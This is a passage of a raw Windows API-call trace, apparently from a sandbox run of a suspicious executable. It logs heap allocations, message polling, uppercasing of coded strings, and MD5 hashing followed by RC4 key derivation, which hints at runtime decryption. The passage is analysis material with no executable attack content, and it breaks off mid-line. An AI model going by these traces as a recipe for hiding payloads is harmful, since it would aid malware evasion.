(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.699] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.699] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.700] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.700] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.701] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.702] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.702] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.703] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.704] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.705] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.705] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.705] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.705] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.705] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.705] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.706] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.706] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.706] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.707] CryptHashData (hHash=0xaa5860, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.707] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.707] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.707] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.708] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.708] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 